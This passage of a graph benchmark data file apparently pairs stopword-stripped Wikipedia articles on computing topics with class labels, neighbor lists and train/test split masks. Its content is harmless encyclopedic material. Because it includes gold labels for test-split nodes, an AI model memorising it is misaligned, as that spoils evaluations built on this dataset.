      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      11442,
      10933,
      10422,
      5815,
      7863,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      10237,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      11179,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8603,
    "label": 4,
    "text": "Interlock_protocol:interlock protocol interlock protocol described ron rivest adi shamir designed frustrate eavesdropper attack two parties use anonymous key exchange protocol secure conversation paper proposed using authentication protocol subsequently broken cryptographic protocols rely prior establishment secret public keys passwords however diffie–hellman key exchange protocol introduced concept two parties establishing secure channel least desirable security properties without prior agreement unauthenticated diffie–hellman anonymous key agreement protocol long known subject man middle attack however dream zipless mutually authenticated secure channel remained interlock protocol described method expose middle-man might try compromise two parties use anonymous key agreement secure conversation interlock protocol works roughly follows strength protocol lies fact half encrypted message decrypted thus mallory begins attack intercepts bob alice keys mallory unable decrypt alice half-message encrypted using key re-encrypt using bob key must wait halves message received read succeed duping one parties composes completely new message davies price proposed use interlock protocol authentication book titled security computer networks attack described steven m. bellovin michael merritt subsequent refinement proposed ellison bellovin/merritt attack entails composing fake message send first party passwords may sent using interlock protocol b follows ea b message encrypted key derived diffie–hellman exchange b 1 2 denote first second halves pa/pb passwords b attacker z could send half bogus message—p -- elicit pa point z compromised pa pb attack defeated verifying passwords parts ea z p 1 sent known invalid ea z pa 2 never sent suggested davies however work passwords hashed since half hash useless according bellovin also several methods proposed including using shared secret addition password forced-latency enhancement also prevent certain attacks modified interlock protocol require b server delay responses known duration data encrypted data immediately follows interlock protocol exchange could anything encoded using all-or-nothing transform prevent in-transit modification message 1 could contain encrypted request copy ka 2 could contain decryption key 1 mb 1 could contain encrypted copy kb mb 2 could contain decryption key mb 1 response ok found hash digest data mitm attempted using attack described bellovin paper z man-in-the-middle case receives data approximately 3*t since z perform interlocking exchange b hence attempted mitm attack detected session aborted course z could choose perform interlock protocol b opting instead send mb session would z z b z would n't middle reason interlock protocol effectively used provide authentication although ensure third party modify messages transit without detection",
    "neighbors": [
      2932,
      1941,
      2558,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 8604,
    "label": 6,
    "text": "GMail_Drive:gmail drive gmail drive free third-party windows shell namespace extension add-on google gmail gmail drive supported google allowed user access virtual drive stored gmail account causing contents gmail account appear new network share user workstation order use add-on user needed gmail e-mail account add-on enabled user use standard windows desktop file copy paste commands transfer files gmail account drive user computer gmail drive based upon gmailfs file system developed richard jones gmail drive published 2004 functional early 2005 predates google later implementation google drive released april 24 2012 2015 official extension page declares project dead order gmail drive operate computer must connected internet user must gmail account broadband connection preferable though necessary operations done gmail consequently internet gmail drive uses inbox gmail account store files creates virtual filesystem top gmail account enabling user save retrieve files stored gmail account directly inside windows explorer gmail drive adds new virtual drive computer computer folder user create new folders copy drag-and-drop files give actual drive letter c preventing use console applications older windows applications user creates new file using gmail drive generates e-mail posts gmail account inbox e-mail appears normal inbox folder using normal gmail interface file attached e-mail attachment gmail drive periodically checks mail account using gmail search function see new files arrived rebuild virtual drive directory structures multiple computers connect one gmail account thus allowing gmail drive act multi-user file server consequently restrictions gmail service also enforced using gmail drive example files larger 25 mb uploaded maximum file size gmail attachments 25 mb past gmail also prevented users transferring certain file types executable zip archives contain executable within users bypassed restriction renaming file extension putting rar 7z archive restriction lifted gnu software package named phpgmaildrive even makes possible link different gmail accounts together manual changes gmail drive built several gmail accounts gmail drive experimental package depends provided google changes google gmail system may render gmail drive temporarily permanently inoperable current gmail drive support accounts hosted google apps gmail program policies explicitly ban gmail drive shell namespace extensions use gmail storage space files e-mail nonetheless immoderate use gmail drive may trigger google temporarily suspend gmail account",
    "neighbors": [
      6797
    ],
    "mask": "None"
  },
  {
    "node_id": 8605,
    "label": 9,
    "text": "CommonJS:commonjs commonjs project goal establish conventions module ecosystem javascript outside web browser primary reason creation major lack commonly accepted form javascript scripts module units could reusable environments different provided conventional web browser e.g web server native desktop applications run javascript scripts project started mozilla engineer kevin dangoor january 2009 initially named serverjs august 2009 project renamed commonjs show broader applicability apis specifications created approved open process specification considered final finished multiple implementations commonjs affiliated ecma international group tc39 working ecmascript members tc39 participate project may 2013 isaac z. schlueter author npm package manager node.js said commonjs made obsolete node.js avoided core node.js developers list specifications includes",
    "neighbors": [
      1409,
      259,
      8068,
      3462,
      5255,
      6791,
      1802,
      6154,
      10507,
      8854,
      4378,
      7455,
      1698,
      803,
      3761,
      1203,
      11060,
      438,
      4920,
      1470,
      5311,
      2880,
      7871,
      9152,
      4171,
      11087,
      339,
      84,
      11221,
      4822,
      4056,
      9560,
      9561,
      603,
      8289,
      482,
      5219,
      7396,
      487,
      5483,
      9195,
      5101,
      10991,
      10097,
      10744,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 8606,
    "label": 2,
    "text": "Honeywell_CP-6:honeywell cp-6 cp-6 discontinued computer operating system developed honeywell inc. 1976 backward-compatible work-alike xerox cp-v fully rewritten honeywell level/66 hardware cp-6 command line oriented system terminal emulator allowed use pcs cp-6 terminals 1975 xerox decided sell computer business purchased scientific data systems 1969 deal put together harry sweatt honeywell purchased xerox data systems took xerox sales field computer support staff provide field service support existing customer base xerox made available spare equipment supplies warehouses containing revenues shared 60/40 xerox cp-6 general release 60/40 honeywell three years thereafter following revenue went honeywell early 1960s honeywell built sold large number h200 machines together software 1970 bought computer business general electric cp-6 system including operating system program products developed beginning 1976 honeywell attract xerox cp-v users 750 sigma users buy use honeywell equipment honeywell employed initial team 60 programmers xerox cp-v development team added another 30 programmers plus management staff organized hank hoagland shel klee team housed old xerox marketing office 5250 w. century blvd los angeles became known los angeles development center ladc new operating system called cp-6 ladc reported administratively honeywell computer group phoenix facility honeywell acquired general electric first beta site installed carleton university ottawa canada june 1979 three sites installed end 1979 customers worked ladc directly exchange users group throughout specification development period review approve direction development compromises order feature implementation comshare major xerox customer operating system needed capacity service rapidly expanding timesharing business help ladc hardware engineers using xerox specifications honeywell engineers phoenix built 30 sigma 9 computers 24 comshare 6 customers project initiated 1978 machines sold original retail price delivered beginning third quarter 1979 1981 cp-6 modeled xerox cp-v code completely rewritten new high-level language pl-6 designed built expressly purpose rather assembly language cp-v increasing complexities new virtual addressing hardware honeywell ’ l66 dps 8 line rewrite existing weaknesses addressed many new features added like cp-v cp-6 five access modes operated concurrently batch processing remote batch timesharing transaction processing real-time processing included multiprogramming operated multiple cpus also like cp-v design integrated file management system files equally compatibly available programs executing mode files could sorted indexed keyed relative consecutive order new cp-6 use communications terminal interfaces minicomputer honeywell level 6 -based front-end processors connected locally remotely combination cp-6 included integrated software development system supported included set language processors apl basic cobol fortran rpg idp ids/ii sort/merge pl-6 gmap text formatting program text commonly needed software packages pascal snobol lisp spss bmdp imsl spiceii slam developed carleton university operating system supported inter-system communication job submission file transfer cp-6 systems cp-6 cp-v ibm hasp protocol systems system used communications terminal interfaces honeywell level 6 minicomputer-based front-end processor asynchronous bisynchronous tcp/ip communications protocols supported honeywell hardware system cp-6 consisted mainframe host processor l66 dps8 dps8000 dps90 connected disks tapes printers card equipment connected high-speed channel connected host level 6 mini computer provided processing connection terminals communications lines high-speed channel remote computers including ladc customers on-line support new version download problem fix patches terminal emulator allowed use pcs cp-6 terminals product additions mid eighties included adaptation dps8000 bull mainframe computers cp-6 included on-line problem reporting fix system beginning 1976 system named system technical action request star people oversaw star system starlords programmers direct access customers computers could fix problems directly on-line system used honeywell proprietary network",
    "neighbors": [
      2179,
      4998,
      4881,
      5531,
      7983,
      8502,
      11075,
      8262,
      10569,
      5450,
      8138,
      8524,
      2519,
      7514,
      1501,
      11236,
      6502,
      10730,
      5881
    ],
    "mask": "Train"
  },
  {
    "node_id": 8607,
    "label": 2,
    "text": "List_of_Microsoft_Windows_application_programming_interfaces_and_frameworks:list microsoft windows application programming interfaces frameworks following list microsoft apis frameworks",
    "neighbors": [
      10243,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      4647,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      9808,
      4178,
      9813,
      603,
      1632,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      4326,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      3344,
      9491,
      5401,
      5913,
      8473,
      11546,
      4384,
      2854,
      11559,
      10024,
      3881,
      10026,
      10029,
      11570,
      5952,
      1348,
      6984,
      844,
      10079,
      11616,
      9593,
      2943,
      9609,
      9612,
      9114,
      10654,
      11683,
      6060,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 8608,
    "label": 5,
    "text": "P2PSP:p2psp p2psp peer peer straightforward protocol communication protocol application layer streaming multimedia content internet users play stream sync used build variety live broadcasting services ranging small meetings large systems iptv unlike traditional cs client-server cdn content delivery network based video streaming p2p contributes upstream bandwidth system therefore general p2p systems scalable architectures based model client-server .this protocol helps reducing bandwidth usage source broadcast using upload bandwidth peers connected source p2psp specially defined streaming live footage thus transmitted communications network based packet switching event occurring time way already created recorded events p2psp hybrid structure mesh network every peer connected star network sources every peer connected one server directly pure p2psp overlay lies one extreme one server every peer connected one part media sent peer turn sends part peers connected network extreme large group p2psp teams connected star structure results requirement upload bandwidth source since packet transmitted one time single/multiple source broadcast",
    "neighbors": [
      10368,
      10021,
      2222
    ],
    "mask": "Test"
  },
  {
    "node_id": 8609,
    "label": 9,
    "text": "Just-in-time_compilation:just-in-time compilation computing just-in-time jit compilation also dynamic translation run-time compilations way executing computer code involves compilation execution program – run time – rather prior execution often consists source code commonly bytecode translation machine code executed directly system implementing jit compiler typically continuously analyses code executed identifies parts code speedup gained compilation recompilation would outweigh overhead compiling code jit compilation combination two traditional approaches translation machine code – ahead-of-time compilation aot interpretation – combines advantages drawbacks roughly jit compilation combines speed compiled code flexibility interpretation overhead interpreter additional overhead compiling interpreting jit compilation form dynamic compilation allows adaptive optimization dynamic recompilation microarchitecture-specific speedups – thus theory jit compilation yield faster execution static compilation interpretation jit compilation particularly suited dynamic programming languages runtime system handle late-bound data types enforce security guarantees jit compilation applied programs used certain capacities particularly dynamic capacities regular expressions example text editor may compile regular expression provided runtime machine code allow faster matching – done ahead time pattern provided runtime several modern runtime environments rely jit compilation high-speed code execution including implementations java together microsoft .net framework similarly many regular-expression libraries feature jit compilation regular expressions either bytecode machine code jit compilation also used emulators order translate machine code one cpu architecture another common implementation jit compilation first aot compilation bytecode virtual machine code known bytecode compilation jit compilation machine code dynamic compilation rather interpretation bytecode improves runtime performance compared interpretation cost lag due compilation jit compilers translate continuously interpreters caching compiled code minimizes lag future execution code given run since part program compiled significantly less lag entire program compiled prior execution bytecode-compiled system source code translated intermediate representation known bytecode bytecode machine code particular computer may portable among computer architectures bytecode may interpreted run virtual machine jit compiler reads bytecodes many sections full rarely compiles dynamically machine code program run faster done per-file per-function even arbitrary code fragment code compiled executed hence name just-in-time cached reused later without needing recompiled contrast traditional interpreted virtual machine simply interpret bytecode generally much lower performance interpreter even interpret source code without step first compiling bytecode even worse performance statically-compiled code native code compiled prior deployment dynamic compilation environment one compiler used execution common goal using jit techniques reach surpass performance static compilation maintaining advantages bytecode interpretation much heavy lifting parsing original source code performing basic optimization often handled compile time prior deployment compilation bytecode machine code much faster compiling source deployed bytecode portable unlike native code since runtime control compilation like interpreted bytecode run secure sandbox compilers bytecode machine code easier write portable bytecode compiler already done much work jit code generally offers far better performance interpreters addition cases offer better performance static compilation many optimizations feasible run-time jit must render execute native binary image runtime true machine-code jits necessitate platforms allow data executed runtime making using jits harvard architecture-based machine impossible said certain operating systems virtual machines well however special type jit may potentially target physical machine cpu architecture rather optimized vm bytecode limitations raw machine code prevail especially bytecode vm eventually leverages jit native code jit causes slight noticeable delay initial execution application due time taken load compile bytecode sometimes delay called startup time delay warm-up time general optimization jit performs better code generate initial delay also increase jit compiler therefore make trade-off compilation time quality code hopes generate startup time increased io-bound operations addition jit compilation example rt.jar class data file java virtual machine jvm 40 mb jvm must seek lot data contextually huge file one possible optimization used sun hotspot java virtual machine combine interpretation jit compilation application code initially interpreted jvm monitors sequences bytecode frequently executed translates machine code direct execution hardware bytecode executed times saves compilation time reduces initial latency frequently executed bytecode jit compilation used run high speed initial phase slow interpretation additionally since program spends time executing minority code reduced compilation time significant finally initial code interpretation execution statistics collected compilation helps perform better optimization correct tradeoff vary due circumstances example sun java virtual machine two major modes—client server client mode minimal compilation optimization performed reduce startup time server mode extensive compilation optimization performed maximize performance application running sacrificing startup time java just-in-time compilers used runtime measurement number times method executed combined bytecode size method heuristic decide compile still another uses number times executed combined detection loops general much harder accurately predict methods optimize short-running applications long-running ones native image generator ngen microsoft another approach reducing initial delay ngen pre-compiles pre-jits bytecode common intermediate language image machine native code result runtime compilation needed .net framework 2.0 shipped visual studio 2005 runs ngen microsoft library dlls right installation pre-jitting provides way improve startup time however quality code generates might good one jited reasons code compiled statically without profile-guided optimization good jit compiled code extreme case lack profiling data drive instance inline caching also exist java implementations combine aot ahead-of-time compiler either jit compiler excelsior jet interpreter gnu compiler java earliest published jit compiler generally attributed work lisp john mccarthy 1960 seminal paper recursive functions symbolic expressions computation machine part mentions functions translated runtime thereby sparing need save compiler output punch cards although would accurately known compile go system another early example ken thompson 1968 gave one first applications regular expressions pattern matching text editor qed speed thompson implemented regular expression matching jiting ibm 7094 code compatible time-sharing system influential technique deriving compiled code interpretation pioneered mitchell 1970 implemented experimental language lc² smalltalk c. 1983 pioneered new aspects jit compilations example translation machine code done demand result cached later use memory became scarce system would delete code regenerate needed sun self language improved techniques extensively one point fastest smalltalk system world achieving half speed optimized c fully object-oriented language self abandoned sun research went java language term just-in-time compilation borrowed manufacturing term time popularized java james gosling using term 1993 currently jiting used implementations java virtual machine hotspot builds extensively uses research base hp project dynamo experimental jit compiler 'bytecode format machine code format system turned pa-6000 machine code pa-8000 machine code counterintuitively resulted speed ups cases 30 since permitted optimizations machine code level example inlining code better cache usage optimizations calls dynamic libraries many run-time optimizations conventional compilers able attempt 30 march 2019 php announced jit coming php 8 2021 jit compilation fundamentally uses executable data thus poses security challenges possible exploits implementation jit compilation consists compiling source code byte code machine code executing generally done directly memory – jit compiler outputs machine code directly memory immediately executes rather outputting disk invoking code separate program usual ahead time compilation modern architectures runs problem due executable space protection – arbitrary memory executed otherwise potential security hole thus memory must marked executable security reasons done code written memory marked read-only writable/executable memory security hole see w^x instance firefox jit compiler javascript introduced protection release version firefox 46 jit spraying class computer security exploits use jit compilation heap spraying – resulting memory executable allows exploit execution moved heap",
    "neighbors": [
      7173,
      5640,
      4112,
      3603,
      3613,
      3102,
      9245,
      5154,
      5677,
      6705,
      1591,
      2620,
      4669,
      6718,
      8262,
      8280,
      6233,
      3071,
      11361,
      7273,
      2666,
      9330,
      3705,
      5754,
      5264,
      8854,
      7833,
      8868,
      1703,
      8879,
      11449,
      4799,
      3270,
      5844,
      9432,
      219,
      10469,
      10470,
      5354,
      9964,
      5358,
      5872,
      4853,
      2808,
      7421,
      6910,
      5378,
      5892,
      5381,
      7941,
      11537,
      7954,
      5395,
      1820,
      10013,
      6950,
      7462,
      10537,
      7978,
      814,
      815,
      1841,
      11060,
      6965,
      1852,
      5952,
      8000,
      6477,
      339,
      9044,
      3413,
      1376,
      8037,
      6502,
      11625,
      8554,
      7531,
      10603,
      10097,
      3442,
      6016,
      1409,
      10624,
      4486,
      9612,
      398,
      1427,
      11670,
      1952,
      11688,
      3499,
      7595,
      6061,
      6067,
      438,
      10684,
      5567,
      9152,
      8644,
      10703,
      3553,
      487,
      8680,
      5612,
      9714,
      499,
      3573,
      3577,
      6142,
      6143
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8610,
    "label": 5,
    "text": "Fast_Local_Internet_Protocol:fast local internet protocol fast local internet protocol flip suite internet protocols provide security transparency security network management flip designed vrije universiteit amsterdam support remote procedure calling amoeba distributed operating system osi model flip occupies layer 3 thus replacing ip also obviates need transport-level protocol like tcp flip connectionless protocol designed support transparency group communication secure communication easy network management following flip properties helps achieve efficiency requirements",
    "neighbors": [
      5472,
      9441,
      10924,
      5531,
      10589
    ],
    "mask": "None"
  },
  {
    "node_id": 8611,
    "label": 9,
    "text": "Perl_Data_Language:perl data language perl data language abbreviated pdl set free software array programming extensions perl programming language pdl extends data structures built perl include large multidimensional arrays adds functionality manipulate arrays vector objects also provides tools image processing computer modeling physical systems graphical plotting presentation simple operations automatically vectorized across complete arrays higher-dimensional operations matrix multiplication supported pdl vectorized array programming language expression syntax variation standard mathematical vector notation user combine operate large arrays simple expressions respect pdl follows footsteps apl programming language compared commercial languages matlab interactive data language free languages numpy octave unlike matlab idl pdl allows great flexibility indexing vectorization example subroutine normally operates 2-d matrix array passing 3-d data cube generally cause operation happen 2-d layer cube pdl borrows perl least three basic types program structure imperative programming functional programming pipeline programming forms may combined subroutines may loaded either via built-in autoload mechanism via usual perl module mechanism pdl-like functionality included development perl 6 true glue language roots perl pdl borrows several different modules graphics plotting support netpbm provides image file i/o though fits supported natively gnuplot plplot pgplot prima modules supported 2-d graphics plotting applications gnuplot opengl supported 3-d plotting rendering pdl provides facilities read write many open data formats including jpeg png gif ppm mpeg fits netcdf grib raw binary files delimited ascii tables pdl programmers use cpan perl i/o libraries read write data hundreds standard niche file formats installation pdl usually comes interactive shell known perldl used perform simple calculations without requiring user create perl program file typical session perldl would look something like following commands used shell perl statements used program codice_1 module included codice_2 overloaded operator matrix multiplication codice_3 last command shortcut codice_4 core pdl written c. functionality written pp pdl-specific metalanguage handles vectorization simple c snippets interfaces perl host language via perl xs compiler modules written fortran c/pp interface layer many supplied functions written pdl pp available user write c-language extensions pdl also inline module inline :pdlpp allows pp function definitions inserted directly perl script relevant code low-level compiled made available perl subroutine pdl api uses basic perl 5 object-oriented functionality pdl defines new type perl scalar object eponymously called pdl pronounced piddle acts perl scalar contains conventional typed array numeric character values standard perl operators overloaded used pdl objects transparently pdls mixed-and-matched normal perl scalars several hundred object methods operating pdls supplied core modules perl 6 pdl specified trait synopsis 9 january 2013 feature yet implemented rakudo though",
    "neighbors": [
      9345,
      10145,
      7684,
      8582,
      5703,
      2281,
      5612,
      7983,
      5588,
      7325,
      2519,
      3960,
      11385,
      11610,
      7580,
      2045,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 8612,
    "label": 4,
    "text": "Zardoz_(computer_security):zardoz computer security computer security zardoz list formally known security-digest list famous semi-private full disclosure mailing list run neil gorsuch 1989 1991 identified weaknesses systems gave directions find zardoz notable status perennial target computer hackers sought archives list information undisclosed software vulnerabilities access zardoz approved case-by-case basis gorsuch principally reference user account used send subscription requests requests approved root users valid uucp owners system administrators listed nic openness list users unix system administrators regular topic conversation participants expressing concern vulnerabilities exploitation details disclosed list liable spread hackers hand circulation zardoz postings among computer hackers open secret mocked openly famous phrack parody irc channel populated notable security experts majority zardoz participants unix systems administrators c software developers neil gorsuch gene spafford prolific contributors list",
    "neighbors": [
      3937,
      5636,
      3206,
      4956,
      2061,
      8974,
      10387,
      5492,
      4117,
      8152,
      2041,
      700
    ],
    "mask": "Test"
  },
  {
    "node_id": 8613,
    "label": 4,
    "text": "(ISC)²:isc ² international information system security certification consortium isc ² non-profit organization specializes training certifications cybersecurity professionals described world largest security organization widely known certification offered isc ² certified information systems security professional cissp certification mid-1980s need arose standardized vendor-neutral certification program provided structure demonstrated competence field security several professional societies recognized certification programs attesting qualifications information security personnel desperately needed june 1988 conference hosted national institutes standards technology nist federal information systems security educators association fissea idaho state university pocatello idaho address need standardized curriculum burgeoning profession organizations attendance included • canadian information processing society cips • computer security institute csi • data processing management association special interest group certified professionals dpma sig-cp • data processing management association special interest group computer security dpma sig-cs • idaho state university isu • information systems security association issa • international federation information processing ifip conference question raised virtually every group represented save nist isu creating professional certification conference participants agreed form consortium would attempt bring together competing agendas various organizations november 1988 special interest group computer security sig-cs member data processing management association dpma brought together several organizations interested isc ² formed mid-1989 non-profit organization goal mind 8 1990 first working committee establish something called common body knowledge cbk formed work done committee resulted first version cbk finalized 1992 cissp credential launched 1994 followed sscp credential 2001 cap credential 2005 csslp credential 2008 ccfp hcispp 2013 ccsp 2015 9 2001 isc ² established europe middle east africa regional office london 2002 isc ² opened asia-pacific regional office hong kong 2015 isc ² introduced north america regional office washington d.c since 2011 isc ² organizes annual isc ² security congress conference 2019 conference first international iteration event held orlando florida isc ² maintains calls common body knowledge information security following certifications certified ansi isc ² meets requirements ansi/iso/iec standard 17024 personnel certification accreditation program accreditation covers cissp sscp cissp-issap cissp-issep cissp-issmp cap csslp certifications isc ² certified professionals required earn continuous professional education cpe credits annual basis order maintain certifications cpe credits obtained attending industry events conferences writing articles/book reviews/books etc certified isc ² professionals required support isc ² code ethics violations code ethics investigated peer review panel within potential revoking certification isc ² along security certification organizations criticized lack education area ethics",
    "neighbors": [
      1312,
      10307,
      10372,
      1957,
      357,
      999,
      9607,
      8462,
      5010,
      1493,
      3447,
      6648,
      3994,
      5404,
      10110
    ],
    "mask": "Train"
  },
  {
    "node_id": 8614,
    "label": 4,
    "text": "Padvish_Antivirus:padvish antivirus padvish antivirus commonly known padvish antivirus software package developed iranian company amnpardaz amnpardaz padvish developed distributed home edition business edition server edition endpoint security android also free edition home users word padvish persian پادویش literally means antivirus padvish currently used local industries iei commonly referred saa iran",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      6797,
      10637,
      9341,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8615,
      2859,
      3243,
      6699,
      7983,
      6834,
      4403,
      9523,
      10166,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      2045,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 8615,
    "label": 4,
    "text": "Comodo_Group:comodo group comodo cybersecurity company headquartered clifton new jersey united states company founded 1998 united kingdom melih abdulhayoğlu company relocated united states 2004 products focused computer internet security firm operates certificate authority issues ssl certificates offers information security products enterprises consumers company also helped setting standards contributing ietf internet engineering task force dns certification authority authorization caa resource record comodo member following industry organizations response symantec comment asserting paid antivirus superior free antivirus ceo comodo group challenged symantec 18 september 2010 see whether paid free products better defend consumer malware gcn john breeden understood comodo stance free antivirus software challenging symantec actually pretty smart move based previous reviews av performance 've done gcn lab recent av review year showed functional difference free paid programs terms stopping viruses way many years fact go way back 2006 find av roundup viruses missed companies symantec responded saying comodo interested product included tests independent reviewers comodo volunteered symantec vs. comodo independent review though showdown take place comodo since included multiple independent reviews av-test pc world best antivirus reviews av-comparatives pc mag 23 march 2011 comodo posted report 8 days earlier 15 march 2011 user account affiliate registration authority compromised used create new user account issued nine certificate signing requests nine certificates seven domains issued attack traced ip address 212.95.136.18 originates tehran iran though firm initially reported breach result state-driven attack subsequently stated origin attack may result attacker attempting lay false trail. attack immediately thwarted comodo revoking bogus certificates comodo also stated actively looking ways improve security affiliates update 31 march 2011 comodo stated detected thwarted intrusion reseller user account 26 march 2011 new controls implemented comodo following incident 15 march 2011 removed risk fraudulent issue certificates comodo believed attack perpetrator incident 15 march 2011 regards second incident comodo stated ca infrastructure compromised keys hsms compromised certificates fraudulently issued attempt fraudulently access certificate ordering platform issue certificate failed 26 march 2011 person username comodohacker made several posts pastebin.com claiming iranian responsible attacks issues widely reported led criticism certificates issued revoked 2016 certificates remain revoked microsoft issued security advisory update address issue time event attacks unique comodo – specifics vary ca ca ra ra many entities trusted default holes deemed inevitable february 2015 comodo associated man-in-the-middle enabling tool known privdog claims protect users malicious advertising privdog issued statement 23 february 2015 saying minor intermittent defect detected third party library used privdog standalone application potentially affects small number users potential issue present privdog versions 3.0.96.0 3.0.97.0 potential issue present privdog plug-in distributed comodo browsers comodo distributed version users potentially maximum 6,294 users usa 57,568 users globally could potentially impact third party library used privdog third party library used superfish ... potential issue already corrected update tomorrow automatically update 57,568 users specific privdog versions 2009 microsoft mvp michael burgess accused comodo issuing digital certificates known malware comodo responded notified revoked issued certificates contained rogue malware january 2016 tavis ormandy reported comodo chromodo browser exhibited number vulnerabilities including disabling same-origin policy vulnerability n't browser based open-source code behind google chrome browser rather issue add-on soon comodo became aware issue early february 2016 company released statement fix industry software general always updated patched fixed addressed improved – goes hand hand development cycle ... critical software development companies address issue certain vulnerability found – ensuring never puts customer risk using chromodo immediately received update chromodo browser subsequently discontinued comodo ormandy noted comodo received excellence information security testing award verizon despite vulnerability browser despite vnc delivered default weak authentication despite enabling address space layout randomization aslr despite using access control lists acls throughout product ormandy opinion verizon certification methodology fault october 2015 comodo applied let encrypt comodo let encrypt let encrypt comodo trademarks trademark applications filed almost year internet security research group parent organization let encrypt started using name let encrypt publicly november 2014 despite fact comodo intent use trademark filings acknowledge never used let encrypt brand 24 june 2016 comodo publicly posted forum filed express abandonment trademark applications comodo chief technical officer robin alden said comodo filed express abandonment trademark applications time instead waiting allowing lapse following collaboration let encrypt comodo trademark issue resolved behind us 'd like thank let encrypt team helping bring resolution 25 july 2016 matthew bryant showed comodo website vulnerable dangling markup injection attacks send emails system administrators comodo servers approve wildcard certificate issue request used issue arbitrary wildcard certificates via comodo 30-day positivessl product bryant reached june 2016 25 july 2016 comodo chief technical officer robin alden confirmed fix put place within responsible disclosure date per industry standards",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      517,
      1157,
      5254,
      9221,
      1417,
      11653,
      3981,
      10637,
      4374,
      1052,
      156,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      2214,
      2601,
      5543,
      2859,
      3243,
      3885,
      4013,
      6699,
      6823,
      11309,
      6834,
      4403,
      9394,
      9523,
      10166,
      10425,
      7103,
      704,
      9537,
      7362,
      3395,
      10308,
      4421,
      11584,
      202,
      1355,
      1994,
      5069,
      5834,
      8614,
      10574,
      10831,
      2003,
      724,
      2005,
      10708,
      8024,
      11225,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      115,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 8616,
    "label": 7,
    "text": "YouOS:youos youos web desktop web integrated development environment developed webshaka june 2008 domain acquired german startup company may 2015 project name youos representing mobile platform hyperlocal interaction youos technology used operate german refugee help support system angelaapp 2006 2008 youos replicated desktop environment modern operating system webpage using javascript communicate remote server allows users save current desktop state return later much like hibernation feature many true operating systems multiple users collaborate using single environment youos featured built-in sharing music documents files software alpha stage referred web operating system webshaka application programming interface ide integrated development environment currently development 700 applications created using api 2006 youos listed 7th position pc world list 20 innovative products year youos shut july 30 2008 developers actively developed since november 2006 also could find use since moved projects",
    "neighbors": [
      3109,
      2181,
      3462,
      7983,
      3833
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8617,
    "label": 4,
    "text": "IntruShield:intrushield mcafee intrushield network-based intrusion prevention sensor appliance used prevention zero-day dos denial service attacks spyware malware botnets voip threats called mcafee network security platform ^^ broken ^^",
    "neighbors": [
      704,
      7515,
      10392
    ],
    "mask": "Test"
  },
  {
    "node_id": 8618,
    "label": 2,
    "text": "Intuition_(Amiga):intuition amiga intuition native windowing system user interface ui engine amigaos developed almost entirely rj mical intuition confused workbench amigaos spatial file manager relies intuition handling windows input events intuition internal widget graphics system implemented primarily application-managed graphics library systems following xerox design done rather separate task maintains state standard ui elements independently application makes responsive ui gadgets live even application busy intuition task driven user events mouse keyboard input devices also arbitrates collisions mouse pointer icons control animated icons like guis day amiga intuition followed xerox lead anteceding solutions pragmatically command line interface also included extended functionality platform later releases added improvements like support high-color workbench screens 3d aspect replacement desktop file managers also made available directory opus magellan scalos interface initial releases used blue orange white black palettes intentional – time cheap high-quality video monitors commodore tested output worst televisions could find goal obtaining best possible contrast worst-case conditions due limitations intuition basic widget set developers adopted third-party gui toolkits magic user interface mui reaction object oriented ui engines driven classes graphic objects functions new standard gadgets animated buttons true-color icons etc offered developers standardized attractive interfaces mui similar systems abandoned separation user interface application specified gadgets displayed intuition task actually managed gadgets applications even busy modern day successors workbench environment include ambient morphos scalos workbench amigaos 4 wanderer aros brief article ambient descriptions mui icons menus gadgets aps.fr images zune stay main aros site new object-oriented toolkit amiga-like platforms amigaos morphos aros feelin introduced 2005 makes extensive use xml guidelines uses memory management system memory-pools system shares embedded os semaphores feelin also features non-centralized id allocation system crash-free object invocation mechanism advanced logging system details images feelin found website stewart alsop ii said 1988 intuition among several guis already knocked market apple ibm/microsoft others stating slapped together six months ... lack forethought vision shows criticized intuition drive letters lack network support hundreds small features",
    "neighbors": [
      1664,
      1666,
      3462,
      8582,
      139,
      6797,
      2062,
      5264,
      2193,
      9491,
      1812,
      9236,
      3734,
